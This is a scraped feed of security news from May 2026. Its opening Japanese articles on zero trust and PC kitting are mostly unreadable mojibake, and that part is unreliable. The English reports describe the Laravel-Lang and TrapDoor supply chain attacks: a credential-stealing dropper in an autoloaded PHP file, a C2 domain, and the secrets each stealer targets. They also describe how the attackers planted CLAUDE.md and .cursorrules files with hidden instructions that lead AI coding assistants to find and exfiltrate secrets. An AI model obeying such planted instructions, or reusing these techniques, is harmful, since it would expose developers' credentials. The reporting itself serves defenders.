Device�j�ɂ͐\�����ꂽ�[���ł����MDM�ɎQ�����A�Ɩ��f�[�^�ƌl�f�[�^�����邱�ƂőΉ�����B�g�D�̒[���ɃN���C�A���g�ؖ�����z�z���A�{�l�m�F�̈�Ƃ��āu��В[���ł����A�N�Z�X�ł��Ȃ��v�Ƃ������[�����ݒ�\�ɂȂ����B����Ȃ�A������p�X���[�h���R�ꂽ��A��v�f�F���˔j���ꂽ�肵���Ƃ��Ă��A�W�̂Ȃ��[������̓��O�C�����ł��Ȃ��B �@�[�����̂̌��S���́AEDR��SOC�iSecurity Operation Center�j�ɂ��펞�Ď��ɂ���ĕۏ���Ă���B���̈�Ƃ��āu���o�[�X�V�F���v��p�����U�����������[���Ŏ��{�����ہA������EDR���s�R�ȋ��������m���A�����I�ɒ[�����l�b�g���[�N����u�������Ƃ����G�s�\�[�h����I���ꂽ�B �@�]�����͍u���̍Ō�ɁA������C���^�[�l�b�g�̌o�c���O�u�w��肽�����Ɓx���w�ł���x�ɕς���v�Ƃ������t���Љ���B �@�]���̃Z�L�����e�B��́A�������]���ɂ���u����v�Ƃ��Ċ��������X���ɂ������B�������A���������̊�Ղ̕ϊv�Ŏ������̂́u�Z�L�����e�B�����コ���邱�ƂŁA���ʂƂ��ė��������シ��v�Ƃ������O���B �@�[���g���X�g�A�[�L�e�N�`���ւ̈ڍs�́u1���ɂ��ĂȂ炸�v�ŁA�������̂肪�҂��Ă���B�������������Ȃ��킯�ɂ͂������A�����ł����݂�i�߁A�ςݏd�˂Ă����˂Ȃ�Ȃ��B�]�����𒆐S�Ƃ����[���g���X�g���ւ̓��̂�ɂ́A�Z�p�_�����ł����_�_�����ł��Ȃ��A�g�D���ڎw���ׂ�������f���A�����ɂ܂��i����������̐ςݏd�˂����ՂƂ��Ďc���Ă���B�������Ă����A�����Ă܂˂ł��Ȃ����̂ł͂Ȃ����Ƃ�������͂����B���̎�����Q�l�ɁA���Ѓ[���g���X�g�Z�L�����e�B�Ƃ����A���������シ��g����h����ɓ���Ăق����B Copyright © ITmedia, Inc. All Rights Reserved.
atmarkit.itmedia.co.jpMay 26, 2026extracted
ITコストが爆増する“低品質キッティング”の特徴 あるべき姿を考える
�uPC��z�邾���̎d���v�Ǝv��ꂪ���ȃL�b�e�B���O�ł����A���̕i������ŃC���V�f���g��^�p���ׂ��AIT�R�X�g���傫���ς��܂��B����ł���V�X�̎d���́g�����N���Ȃ��h�قǕ]������܂���B��V�X���o�c�w�ɓ����ׂ��g�{���̉��l�h���@�艺���܂��B ���̋L���͉������ł��B����o�^�i�����j����ƑS�Ă������������܂��B �@�O���ł́A�uPC�L�b�e�B���O���P����Ɓv�Ƃ������[�U�[�����������ȁg����h�������A���IT�E�Z�L�����e�B�̕i�������E���鍂�x�ȃG���W�j�A�����O���{���͕K�v�ɂȂ�͂��ƒ��܂����B �@��҂ƂȂ鍡��́A�Ȃ��L�b�e�B���O���y������₷���̂��A��V�X�����̉��l���o�c�w��Ɩ�����ɂǂ�������܂��������̂����l���Ă����܂��傤�B ��V�X�͍̗p�̌��ɂ߂�]���w�W�̕s�݁A�ӎv����̞B���i�����܂��j���ɂ��A���̎��͂≿�l������������ɂ����W�����}������Ă��܂��B�{�A�ڂł́A�o���̌���������c�[���I��̖{���A�w���v�f�X�N��L�b�e�B���O�̍ĕ]���A�g�ڂ�����V�X�h�̌��E�Ȃǂ�ʂ��āA�P�Ȃ�u���ł����v����E���A�����ɕ]������邽�߂̎��H�I�Ȏ��_����܂��B �@�����̑g�D�Ō����Ƃ��ꂪ���ł����A�L�b�e�B���O�̓Z�L�����e�B�̋N�_�ł��B�����ł̐ݒ�i���ɂ���āA�[�����K�ȊǗ����ɒu����邩�ǂ����AEDR�iEndpoint Detection and Response�j��O���W���@�\���邩�ǂ����A�C���V�f���g�������ɒǐՂł��邩�ǂ��������܂�܂��B �@EDR�����Ă��Ȃ��[����A���O���擾�ł��Ȃ��[�������݂��Ă�����ł́A�C���V�f���g�Ή��͔��ɍ���ɂȂ�܂��B�[�����Í�������Ă��Ȃ���A�������̏��R�������X�N�͍��܂�܂��B�Ǘ��ΏۊO�̒[�����Ɩ��Ɏg���Ă���A�Ǝ㐫�i�������Ⴍ�j�Ή���A�N�Z�X����͕s���S�ɂȂ�܂��B���[�J���Ǘ��Ҍ������K�ɐ��䂳��Ă��Ȃ���A�s���ȕύX��}���E�F�A�������̉e���͈͂��L����܂��B���O���c���Ă��Ȃ���A�����N�����̂����ォ��m�F���邱�Ƃ��ł��܂���B �@�܂�L�b�e�B���O�Ƃ́A�Z�L�����e�B������s�\�ȏ�Ԃɂ���K�v�s���ȍH���ł��B�Z�L�����e�B���i���_�Ă��邾���ł͈Ӗ�������܂���BMDM�i���o�C���[���Ǘ��j�����Ă��邾���ł��s�\���ł��B�|���V�[���������K�p����A�[�����Ǘ����ɂ���A���O�����A�C���V�f���g�Ή��ł����ԂɂȂ��ď��߂āA�Z�L�����e�B��͋@�\���܂��B���̋N�_���L�b�e�B���O�Ȃ̂ł��B�܂��͂��̔F���ŃL�b�e�B���O���čl����K�v������ł��傤�B �@����ł��Ȃ��A�L�b�e�B���O�͌y�����ꂪ���ł��B���̗��R�̓V���v���Ő��ʂ������ɂ�������ł��B�ȉ��͊�Ƃ̃V�X�e�����ɂƂ��Ĕ��ɗǂ���Ԃł��B�������ǂ���Ԃł������قǁA�u�����N���Ă��Ȃ��v���̂悤�Ɍ����Ă��܂��܂��B �@�����āA�L�b�e�B���O�́u�N�ł��ł����ƂɌ�����v�u�O���ł������Ɍ�����v�u�菇��������Ή����Ɍ�����v�Ǝv��ꂪ���ł��B��������Ƃ̈ꕔ���O���Ɉϑ����邱�Ƃ͉\�ł����A�v�v�z���̂��̂��������ɊO������ƁA�P�Ȃ��Ƒ�s�ɂȂ��Ă��܂��܂��B �@���̌��ʁA�u�[�����Ƃɐݒ肪�����ɈႤ�v�u�Ǘ��ΏۊO�̒[�����c��v�u�Z�L�����e�B���i�������Ă��邾���ŋ@�\���Ă��Ȃ��v�u���C�Z���X���K�Ɋ��蓖�Ă��Ă��Ȃ��v�u�C���V�f���g�������Ƀ��O���ǂ��Ȃ��v�u���[�U�[�̌����o���o���ɂȂ�v�Ƃ�������肪�ォ��\�ʉ����܂��B �@�L�b�e�B���O�̕i�����Ⴂ���ł́A�Z�L�����e�B�C���V�f���g�̑�����IT�T�|�[�g�R�X�g�̑���A�]�ƈ��̐��Y���ቺ�Ƃ�����ŁA�m���ɃR�X�g�Ƃ��Ē��˕Ԃ��Ă��邱�Ƃ�Y��Ă͂����܂���B �@�uJamf�v��uIru�v�uMicrosoft Intune�v�Ƃ�����MDM�����������Ƃ�����l�ł���Ε�����͂��ł����A�|���V�[�v�����ƑS�[���ɉe�����o�܂��B �@�X�N���v�g��ŋƖ���~���N���邱�Ƃ����鑼�A�z�z�Ώۂ����A�s�v�ȃA�v�����S�ЂɓW�J����邱�Ƃ�����܂��B�����ݒ�����A�K�v�ȋƖ��A�v���������Ȃ��Ȃ邱�Ƃ�����ł��傤�BBlueprint��|���V�[�O���[�v�̐v����ŁA�^�p�R�X�g�����{�ς���Ă��܂����Ƃ�����܂��B �@�����܂ŕ����L�b�e�B���O���ł��v�i���������Ɩ����ƔF�������߂���̂ł͂Ȃ��ł��傤���B�L�b�e�B���O���y�����Ă���l�́A���Ƃ�1����Z�b�g�A�b�v�����ʂ��������Ă��Ȃ��̂��Ǝv���܂��B �@���������ۂɂ͏�V�X�͂��̗����ŁA�Ɩ��e����Z�L�����e�B�A�^�p���ׁA�č��Ή��A���[�U�[�̌��A�����̊g�����܂ōl�����Đv���Ă��܂��B�M�҂Ƃ��Ă͂�����Ɩ������o�c�w�ɗ������Ă��炢�����̂ł��B �@�ł́A���̋Ɩ��̖{����ނ�ɂǂ����������̂ł��傤���B�d�v�Ȃ̂́u��Ɓv�ł͂Ȃ��u���X�N�Ɖ��l�v�Ō�邱�Ƃł��B �@�u�L�b�e�B���O���撣���Ă��܂��v�ł͓���܂���B�uPC���Z�b�g�A�b�v���Ă��܂��v�ł��s�\���ł��B�����ł͂Ȃ��L�b�e�B���O�ɂ���āA�ǂ̂悤�ȃ��X�N��}���A�ǂ̂悤�ȓ������������A�ǂ̂悤�ȋƖ����l��ł���̂����������K�v������܂��B �@�Ⴆ�A���Ǘ��[��������Ɖ����N����̂��B���O�����Ȃ��ƁA�C���V�f���g���ɉ����ł��Ȃ��Ȃ�̂��B�Í�������Ă��Ȃ��[��������ƁA�ǂ̂悤�ȃ��X�N������̂��B�����Z�b�g�A�b�v�Ɏ��Ԃ�������ƁA�]�ƈ��̗����オ��ɂǂꂾ���e������̂��B���ƂɈˑ�����ƁA�i���̂�����ǂꂾ�����܂��̂��B����������ŁA�L�b�e�B���O���u��Ɓv�ł͂Ȃ��u�o�c���X�N��}����d�g�݁v�Ƃ��Đ������邱�Ƃ��d�v�ł��B �@�L�b�e�B���O�̉��l�͌����ɂ������߁A��V�X������KPI���ӎ��I�ɉ�������K�v������܂��B�Ⴆ�A���̂悤��KPI���l������ł��傤�B �@�����̎w�W�����I�Ɏ������ƂŁA�L�b�e�B���O�͒P�Ȃ闠����Ƃł͂Ȃ��A�Ɩ����Y���ƃZ�L�����e�B���x����d�v�Ȋ����ł��邱�Ƃ����₷���Ȃ�܂��B���Ɍo�c�w�ɑ��ẮA�T�|�[�g�H���팸��C���V�f���g�Ή��R�X�g�̒ጸ�A�]�ƈ��̗����オ�莞�ԒZ�k�A�č��Ή��̌������Ƃ�����ROI�i�����Ό��ʁj�Ō�邱�Ƃ��L���ł��B �@�M�҂̓L�b�e�B���O��P�Ȃ鏀����ƂƂ͑����Ă��܂���B�ނ���A��ƑS�̂�IT�����ƃZ�L�����e�B���x�����K�肷��v�H�����ƍl���Ă��܂��B �@�����̈ӎv����̐ςݏd�˂��A���̂܂܊�Ƃ�IT�E�Z�L�����e�B�̐��n�x�����肵�܂��B�uWindows�v�ł���umacOS�v�ł���A�L�b�e�B���O�̖{���͋��ʂ��Ă���A�g����ׂ���Ԃ�v���A�Č����������ēW�J��������h���Ƃł��B�����Ă��̕i�����Z�L�����e�B��K�o�i���X�A�Ɩ����Y���̑S�Ăɒ�������̂ł��B �@PC�L�b�e�B���O���u�P����Ɓv�Ƒ����邩�B����Ƃ��u��Ƃ̊�Ղ��x����v�v�Ƒ����邩�B���̔F���̍��́A���̂܂܊�Ƃ�IT�E�Z�L�����e�B�̗͂̍��ɂȂ�܂��B�L�b�e�B���O���y������g�D�́A�����Ȃ����X�N������܂��B�L�b�e�B���O�𐳂����v���Ă���g�D�́A�����Ȃ��Ƃ���ŋƖ��ƃZ�L�����e�B���x���Ă��܂��B �@�����͑S�āA�F�����V�X����荞���ʂł��B�����炱���A��V�X�ɂ͋Z�p�͂����łȂ��A�|��͂����߂��܂��B�Z�p�I�ȍ�Ƃ��A�o�c���X�N��Ɩ����Y���A�Z�L�����e�B�����̌��t�ɖ|��͂ł��B�L�b�e�B���O�̖{���𐳂����������A����������邱�ƁB���ꂱ�������ꂩ��̏�V�X�ɋ��߂���d�v�Ȗ����ł͂Ȃ��ł��傤���B �@����̓w���v�f�X�N�Ɩ��̖{���ƁA�₢���킹�Ή����g�̎d������g�D���P�̋N�_�ɕς��邽�߂ɕK�v�Ȏ��_�ɂ��ċ�̓I�ɉ�����Ă����܂��B NetworkEngineer�AServerEngineer���o�āA�O���n�x���_�[��SIer�y�юГ��V�X�e��Engineer���o���B���̌�Afreee������ЂɊm����IPO�����̂��߁A�R�[�|���[�gIT����̗����グ�̐ӔC�҂Ƃ��ĎQ��B���Ђł́AITEngineer�����߂Ȃ���CSIRT���������A�Z�L�����e�B���������{�B���݂́A�o�����G���X�e�N�m���W�[�Y������Ђ̎��s����CIO/CISO�A���V�X�e������/�R�[�|���[�g�G���W�j�A�B�܂��A���Ђł̋Ɩ��ϑ���IT�ږ�Ȃǂ��S��ISMS��P�}�[�N�擾��X�V�A�č��Ή������Ή��B Copyright © ITmedia, Inc. All Rights Reserved.
atmarkit.itmedia.co.jpMay 25, 2026extracted
Laravel-Lang Packages Poisoned for Malware Delivery
Four popular Composer packages maintained by the Laravel-Lang organization were poisoned with malware after hackers rewrote all their Git tags, security researchers warn. The affected packages, namely laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, are third-party localization libraries used by Laravel applications. The Laravel-Lang supply chain attack started on May 22. During a 15-minute window, the attackers published malicious version tags across three of the packages, StepSecurity says. By 00:00 UTC, May 23, all four packages had been poisoned. “The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization’s release process, rather than a single malicious package version,” Socket notes. According to the supply chain security firm, the malicious tags were published across over 700 historical versions of the four packages, potentially impacting all applications that fetched updates for them or installed them fresh. “What makes this particularly sneaky is that the malicious code was never committed to the official repos at all. GitHub allows version tags to point to commits from a fork of the same repository. The attacker exploited this to create tags pointed to commits in a malicious fork they controlled,” Aikido Security explains. The malicious version tags contained a file named src/helpers.php, posing as a Laravel localization helper. The code fingerprints the machine, then connects to the command-and-control (C&C) domain flipboxstudio[.]info to fetch a PHP credential stealer and execute it in the background. The malware was designed to harvest cloud keys and tokens (including AWS, GCP, and Azure), Docker and Kubernetes configurations, HashiCorp Vault tokens, Helm repository configurations, SSH private keys, developer credentials, authentication tokens, shell history files, and credential-storing files. Additionally, the malware would target credentials stored in browsers and password managers, cryptocurrency wallets and extensions, various communication platforms, VPN configuration files, and various high-value configuration and credential files across Windows, Linux, and macOS systems. Organizations and users alike are advised to block the affected packages and treat any systems that installed them as potentially compromised. They should also confirm the availability of clean versions and install them. “Because the payload targets cloud metadata, Kubernetes tokens, Vault, CI/CD systems, browser data, password managers, source control credentials, VPN configs, SSH keys, .env files, and local application configs, affected teams should rotate any secrets available to hosts, containers, CI runners, or developer machines that installed or ran the compromised packages,” Socket notes. Related: Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack Related: Grafana Says Codebase and Other Data Stolen via TanStack Supply Chain Attack Related: Over 320 NPM Packages Hit by Fresh Mini Shai-Hulud Supply Chain Attack
securityweek.comMay 25, 2026extracted
TrapDoor Supply Chain Attack Spreads Credential-Stealing Malware via npm, PyPI, and CratesIO
A new coordinated cross-ecosystem software supply chain attack campaign has targeted npm, PyPI, and Crates.io to distribute credential-stealing malware. The campaign, codenamed TrapDoor, spans more than 34 malicious packages across over 384 versions. The earliest activity was recorded on May 22, 2026, at 8:20 p.m. UTC, with new packages published to the ecosystems in waves from a cluster of accounts in quick succession. "TrapDoor targets developers in crypto, DeFi, Solana, and AI communities," Socket said. "The malicious packages are designed to steal developer secrets, crypto wallets, SSH keys, cloud credentials, browser data, and environment variables." "Several npm packages also deploy a shared payload, trap-core.js, that scans for credentials, validates AWS and GitHub tokens, attempts SSH-based lateral movement, and plants persistence through .cursorrules, CLAUDE.md, Git hooks, shell hooks, systemd, cron, and SSH." It's worth noting that the activity has no connection to another campaign of the same name that HUMAN's Satori Threat Intelligence and Research Team detailed last week as engaging in ad fraud by distributing 455 Android apps through the Google Play Store. The list of identified packages is below - Crates.io - move-analyzer-build - move-compiler-tools - move-project-builder - sui-framework-helpers - sui-move-build-helper - sui-sdk-build-utils npm - async-pipeline-builder - build-scripts-utils - chain-key-validator - crypto-credential-scanner - defi-env-auditor - defi-threat-scanner - deployment-key-auditor - dev-env-bootstrapper - eth-wallet-sentinel - llm-context-compressor - mnemonic-safety-check - model-switch-router - node-setup-helpers - project-init-tools - prompt-engineering-toolkit - solidity-deploy-guard - token-usage-tracker - wallet-backup-verifier - wallet-security-checker - web3-secrets-detector - workspace-config-loader PyPI - cryptowallet-safety - data-pipeline-check - defi-risk-scanner - env-loader-cli - eth-security-auditor - git-config-sync - solidity-build-guard The operation is notable for its diverse delivery paths, using postinstall hooks, remote JavaScript payloads that are executed during package imports, and malicious build.rs scripts to target Sui and Move developers. The packages masquerade as seemingly harmless tools, giving attackers the ability to reach a broad audience. The npm packages have been found to run a JavaScript payload ("trap-core.js"), which scans for credentials and developer secrets, validates stolen credentials using AWS and GitHub API calls, and creates persistence on the host using cron jobs, systemd services, Git hooks, and moves across the network via SSH. The Rust crates, in a similar fashion, search for local keystores, encrypt the data using a hardcoded XOR key, and exfiltrate it to GitHub Gists. The packages are also noteworthy for the use of a build script ("build.rs") to trigger the execution of the malicious code. The Python packages associated with TrapDoor are designed such that they are auto-executed on import. The primary goal of the packages is to download JavaScript from an attacker-controlled GitHub Pages domain ("ddjidd564.github[.]io"), and run it using "node -e." "This technique allows the Python package to delegate execution to a remote JavaScript payload, giving the attacker more flexibility after publication," Socket explained. "By hosting the payload externally, the attacker can update behavior without publishing a new PyPI release." An unusual aspect of the campaign is the implanting of .cursorrules and CLAUDE.md containing hidden instructions to trick artificial intelligence (AI) assistants into running a "security scan" that results in secret discovery and exfiltration. This is achieved by opening GitHub pull requests (PRs) across popular AI and developer projects, including "browser-use/browser-use," "langchain-ai/langchain," and "langflow-ai/langflow." The PR activity indicates that TrapDoor extends beyond pushing malicious packages to open-source ecosystems. Socket said the threat actor is likely testing whether AI-related project files can be introduced through regular open-source contribution workflows, thereby causing AI coding tools to parse those hidden instructions and apply them. The findings once again demonstrate how threat actors are increasingly targeting developer workflows, aiming to steal a wide range of information that could make it possible to burrow deeper into target environments for follow-on attacks. "TrapDoor shows how attackers are combining traditional package typosquatting with newer developer-environment attack paths," Socket said. "The package names are tailored to appear relevant to crypto development, AI tooling, local environment setup, and security workflows. The malware then uses ecosystem-specific execution paths: build.rs in Rust, postinstall hooks in npm, and import-time execution in Python."
thehackernews.comMay 25, 2026extracted
Week in review: GitHub breached via poisoned VS Code extension, critical NGINX flaw exploited
Week in review: GitHub breached via poisoned VS Code extension, critical NGINX flaw exploited Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: GitHub, Grafana Labs breaches traced back to TanStack supply chain compromise GitHub CISO Alexis Wales has named the malicious VS Code extension behind the breach they suffered at the hands of the threat group TeamPCP: Nx Console, a popular developer tool with 2.2 million installs. Earbud sensors can authenticate users by their heartbeat, study finds Researchers built a continuous authentication system called AccLock that identifies a wearer by the tiny vibrations a heartbeat makes inside the ear canal. Attackers are exploiting critical NGINX vulnerability (CVE-2026-42945) A critical NGINX vulnerability (CVE-2026-42945) disclosed last week is being exploited by attackers, VulnCheck security researcher Patrick Garrity revealed on Saturday. Communicating cyber risk in dollars boards understand In this Help Net Security interview, Nick Nieuwenhuis, Cybersecurity Architect at Nedscaper, explains why cybersecurity has not delivered the resilience that decades of investment have promised. Microsoft provides mitigation for “YellowKey” BitLocker bypass flaw (CVE-2026-45585) Microsoft is working on a fix for CVE-2026-45585 (aka “Yellowkey”), a vulnerability that can be used by attackers to bypass protections offered by BitLocker, the full-disk encryption feature built into Windows, and access users’ data. Why AI changed the threat model for travel technology In this Help Net Security interview, Devon Bryan, SVP, Global CSO at Booking Holdings, reflects on his path from Air Force network security engineer to global CSO across financial services, hospitality, and travel technology. Deleted Google API keys keep working for up to 23 minutes, researchers warn Google API keys are credentials that let applications access Google services, from Maps to the Gemini AI. If a key is leaked, an attacker can use it to make API calls, rack up charges, and, if Gemini is enabled, access uploaded files and cached conversations. The assumed fix is simple: delete the key. But Aikido Security has found that deletion doesn’t actually work right away. Microsoft open-sources tools for designing and testing AI agents Microsoft has open-sourced two tools aimed at bringing security discipline to AI agent development: Clarity, a structured design review tool, and RAMPART, a continuous testing framework. AI red teaming agents change how LLMs get tested Adversarial probing of LLMs has piled up a sprawling toolkit over the past three years. Attack techniques with names like Tree of Attacks with Pruning, Crescendo, and Skeleton Key sit alongside hundreds of prompt transforms and scoring methods across open-source frameworks including Microsoft’s PyRIT, NVIDIA’s Garak, and Promptfoo. Microsoft Defender vulnerabilities exploited in the wild (CVE-2026-41091, CVE-2026-45498) Attackers are exploiting two Microsoft Defender vulnerabilities (CVE-2026-41091 and CVE-2026-45498), Microsoft acknowledged and CISA confirmed by adding them to its Known Exploited Vulnerabilities catalog. Verizon DBIR: Vulnerability exploitation is the dominant initial access vector Vulnerability exploitation has overtaken stolen credentials as the most common way attackers gain initial access to target networks, according to the 2026 Verizon Data Breach Investigations Report. PureLogs infostealer is stealing credentials worldwide A phishing campaign is smuggling the powerful PureLogs information stealer onto targets’ Windows machines by hiding encrypted malicious payloads inside cat photos, Fortinet researchers discovered. New macOS infostealer impersonates Apple, Microsoft, and Google in a single attack chain A SHub macOS infostealer variant called Reaper impersonates Apple, Microsoft, and Google to trick users into executing malicious code, then targets browser data, password managers, and cryptocurrency wallets while establishing persistence for continued access, SentinelOne found. AI is drowning software maintainers in junk security reports AI-assisted vulnerability research has exploded, unleashing a firehose of low-quality reports on overworked software maintainers who are wasting hours sifting through noise instead of fixing real problems. The end of unencrypted Discord calls is here Discord has protected voice and video calls in DMs, group DMs, voice channels, and Go Live streams with end-to-end encryption (E2EE) by default. The AI backdoor your security stack is not built to see Enterprises deploying LLMs have spent the past two years building defenses around a reasonable assumption: malicious behavior leaves a trace in the input. Scan for suspicious tokens, filter unusual characters, watch for prompt injection patterns. New research from Microsoft and the Institute of Science Tokyo demonstrates that this defensive posture has a blind spot, and the cost of that blind spot could be measured in leaked proprietary data and regulatory exposure. When ransomware hits, confidence doesn’t restore endpoints Ransomware, supply chain vulnerabilities, insider threats, compliance failures, and software disruptions remain major concerns for security leaders, according to The Ransomware Reality: Zero Days to Recover report by Absolute Security. AI shrinks vulnerability exploitation window to hours Time has become organizations’ biggest vulnerability because the gap between vulnerability discovery and exploitation has narrowed to hours, according to Synack’s 2026 State of Vulnerabilities Report. Most dark web activity revolves around a handful of topics A six-year dataset covering more than 25,000 dark web sites tracked what people discussed in underground forums and marketplaces and how those discussions changed over time. Public Instagram posts provide raw material for AI phishing campaigns A handful of public Instagram posts can give attackers enough material to generate convincing phishing emails with GenAI. Research from the University of Texas at Arlington and Louisiana State University showed how public social media activity can be turned into phishing messages that appear personal and credible to human recipients. CVE Lite CLI: Open-source dependency vulnerability scanner Dependency vulnerability scanning in JavaScript and TypeScript projects has long sat at the end of the development pipeline. Pull requests get opened, continuous integration runs, and a security scanner returns a list of CVE identifiers that developers then have to triage hours or days after writing the code. CVE Lite CLI, now an officially recognized OWASP Incubator Project, moves that check to the developer’s terminal. What happens when your identity provider becomes the kill chain In this Help Net Security video, Colin Constable, CTO at Atsign, explains why your identity provider (IdP) has become the kill chain in cyberattacks. Attackers steal session cookies, tokens, or consent grants you’ve already issued and walk in behind you. 7 hard truths security pros should know: 2026 DevOps Threats Report In 2025, trusted Git hosting platforms became a playground for cyber criminals. This is the main conclusion from the latest “DevOps Threat Unwrapped Report 2026” by GitProtect. Product showcase: Bitdefender Mobile Security for iOS protects privacy where scams begin Bitdefender Mobile Security for iOS is a security and privacy application for iPhone and iPad that helps protect against phishing attempts, online scams, unsafe websites, and account exposure. Cybersecurity jobs available right now: May 19, 2026 We’ve scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now. New infosec products of the week: May 22, 2026 Here’s a look at the most interesting products from the past week, featuring releases from ASAPP, Babel Street, CTERA, Forward, Riverbed, and Trust3 AI.
helpnetsecurity.comMay 24, 2026extracted
Laravel Lang packages hijacked to deploy credential-stealing malware
A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages. Security firms StepSecurity, Aikido Security, and Socket warned about the compromise on Friday, warning that attackers had rewritten GitHub tags across four repositories maintained by the Laravel Lang organization rather than publishing entirely new malicious versions. The affected packages include laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and possibly laravel-lang/actions. The Laravel Lang packages are third-party localization packages and are not part of the official Laravel project. According to Aikido, the attackers compromised 233 versions across three repositories, while Socket said roughly 700 historical versions may have been impacted. What made the attack stand out is that the actual project's source code was not modified to include malicious code, but instead the attackers abused a GitHub feature that allows tags to point to commits in forks of the same repository. "Rather than publishing a new malicious version, the attacker rewrote every existing git tag in each repository to point at a new malicious commit," explained StepSecurity. "The rewrites started at 22:32 UTC against laravel-lang/lang (the flagship Laravel translations package, with 502 tags) and finished by 00:00 UTC against laravel-lang/actions. All four repositories share the same fake author identity, the same modified files, and the same payload behavior, which makes them almost certainly the work of one actor using one compromised credential with org wide push access." This allowed the attackers to publish what appeared to be legitimate release tags for the project, which actually led to malicious commits stored in an attacker-controlled fork of the repository. When developers installed the package via Composer, it would download the malicious code while it appeared to install legitimate Laravel Lang releases. Executes a credential-stealer The researchers found that the malicious releases introduced a malicious file named 'src/helpers.php', which was automatically loaded by Composer. The injected code acted as a dropper that downloaded a second payload from the attacker's command and control server at flipboxstudio[.]info. The downloaded PHP payload [VirusTotal] was a large cross-platform credential stealer for Linux, macOS, and Windows that harvests cloud credentials, Kubernetes secrets, Vault tokens, Git credentials, CI/CD secrets, SSH keys, browser data, cryptocurrency wallets, password managers, VPN configurations, and local .env configuration files. The malware also contains regular expression patterns used to extract AWS keys, GitHub tokens, Slack tokens, Stripe secrets, database credentials, JWTs, SSH private keys, and cryptocurrency recovery phrases from files and environment variables. On Windows systems, the PHP payload also extracts a base64-encoded executable [VirusTotal] embedded within the file, which is written to the %TEMP% folder as a random .exe filename, and then launched. BleepingComputer's analysis of the Windows infostealer shows it is named 'DebugElevator' and designed to target Chrome, Brave, and Edge, and extract App-Bound Encryption keys needed to decrypt stored browser credentials. An embedded PDB path also references the Windows account name 'Mero' and contains 'claude,' potentially indicating that AI was used to assist in developing the Windows malware. C:\Users\Mero\OneDrive\Desktop\stuff\claude\Chromium-DebugElevator\x64\Release\DebugChromium.pdb The researchers say that once the sensitive data has been extracted, the malware encrypts it and sends it back to the C2 server. Aikido says they reported the incident to Packagist, which responded quickly by removing the malicious versions and temporarily unlisting the affected packages to prevent additional installations. Developers using Laravel Lang packages are advised to review installed package versions, rotate exposed credentials, inspect systems for indicators of compromise, and, if possible, check for historical outbound connections to flipboxstudio[.]info. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMay 23, 2026extracted
Laravel-Lang PHP Packages Compromised to Deliver Cross-Platform Credential Stealer
Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to Laravel-Lang to deliver a comprehensive credential-stealing framework. The affected packages include - laravel-lang/lang laravel-lang/http-statuses laravel-lang/attributes laravel-lang/actions "The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization's release process, rather than a single malicious package version," Socket said. "The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart." More than 700 versions associated with these packages have been identified, indicating automated mass tagging or republishing. It's suspected that the attacker may have managed to obtain access to organization-level credentials, repository automation, or release infrastructure. What makes the attack stand apart from is that the actual project's source code was not altered to include the malware. Instead, the attackers rewrote every existing git tag in each repository to point to a new malicious commit. The core malicious functionality is located in a file named "src/helpers.php" that's embedded into the version tags. It's mainly designed to fingerprint the infected host and contact an external server ("flipboxstudio[.]info") to retrieve a PHP-based cross-platform payload that runs on Windows, Linux, and macOS. "The attacker added src/helpers.php to the autoload.files map in each compromised package," StepSecurity said. "Because every Laravel application calls require DIR.'/vendor/autoload.php' on startup, and because Symfony, PHPUnit, and most other PHP frameworks do the same, the payload runs the moment any consumer of the package boots. No class instantiation, no method call, no special trigger is required." According to Aikido Security, the dropper delivers a Visual Basic Script launcher on Windows and runs it via cscript. On Linux and macOS, it executes the stealer payload via exec(). "Because this file ['src/helpers.php'] is registered in the composer.json under autoload.files, the backdoor is executed automatically on every PHP request handled by the compromised application," Socket explained. "The script generates a unique per-host marker (an MD5 hash combining the directory path, system architecture, and inode) to ensure the payload only triggers once per machine. This prevents redundant executions and helps the malware remain undetected after the initial run." The stealer is equipped to harvest a wide range of data from compromised systems and exfiltrate it to the same server. This includes - IAM roles and instance identity documents by querying cloud metadata endpoints Google Cloud application default credentials Microsoft Azure access tokens and service principal profiles Kubernetes Service Account tokens and Helm registry configurations Authentication tokens for DigitalOcean, Heroku, Vercel, Netlify, Railway and Fly.io HashiCorp Vault tokens Tokens and configurations from Jenkins, GitLab Runners, GitHub Actions, CircleCI, TravisCI, and ArgoCD Seed phrases and files associated with cryptocurrency wallets (Electrum, Exodus, Atomic, Ledger Live, Trezor, Wasabi, and Sparrow) and extensions (MetaMask, Phantom, Trust Wallet, Ronin, Keplr, Solflare, and Rabby) Browser history, cookies, and login data from Google Chrome, Microsoft Edge, Mozilla Firefox, Brave, and Opera by using a Base64-encoded embedded Windows executable that bypass Chromium's app-bound encryption (ABE) protections Local vaults and browser extension data for 1Password, Bitwarden, LastPass, KeePass, Dashlane, and NordPass PuTTY/WinSCP saved sessions Windows Credential Manager dumps WinSCP saved sessions RDP files Session tokens associated with applications like Discord, Slack, and Telegram Data from Microsoft Outlook, Thunderbird, and popular FTP clients (FileZilla, WinSCP, and CoreFTP) Configuration and credential files containing Docker auth tokens, SSH private keys, Git credentials, shell history files, database history files, Kubernetes cluster configurations, .env files, wp-config.php, and docker-compose.yml Environment variables loaded into the PHP process Source control credentials from global and local .gitconfig files, .git-credentials, and .netrc files VPN configuration and saved login files for OpenVPN, WireGuard, NetworkManager, and commercial VPNs such as NordVPN, ExpressVPN, CyberGhost, and Mullvad "The fetched payload is a ~5,900 line PHP credential stealer, organised into fifteen specialist collector modules," Aikido researcher Ilyas Makari said. "After collecting everything it can find, it encrypts the results with AES-256 and sends them to flipboxstudio[.]info/exfil. It then deletes itself from the disk to limit forensic evidence."
thehackernews.comMay 23, 2026extracted
macOSのキッティングは“なめるなキケン” 情シスが知るべきPC管理の本質
